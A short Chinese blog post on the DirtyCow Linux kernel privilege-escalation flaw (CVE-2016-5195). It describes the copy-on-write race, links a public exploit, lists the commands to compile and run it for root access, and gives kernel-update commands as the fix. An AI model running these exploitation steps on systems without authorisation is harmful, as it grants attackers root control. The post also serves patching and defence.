DirtyCow 脏牛提权漏洞（CVE-2016-5195）

描述：

　　该漏洞是 Linux 内核经典漏洞，内核内存子系统在处理写时拷贝（Copy-on-Write）时存在条件竞争漏洞，导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后，利用此漏洞获取其他只读内存映射的写权限，进一步获取 root 权限。

范围：

　　linux kernel 2.6.22 < 3.9

exp：

　　https://github.com/firefart/dirtycow/blob/master/dirty.c

利用：

　　gcc dirty.c -o exp
　　chmod +x exp
　　./exp
　　mv /tmp/passwd.bak /etc/passwd

修复：

　　升级linux内核即可：yum check-update |grep kernel
　　yum update kernel
　　reboot

posted @ 2022-04-27 15:02 Scivous 阅读(328) 评论(0) 编辑收藏举报

刷新页面返回顶部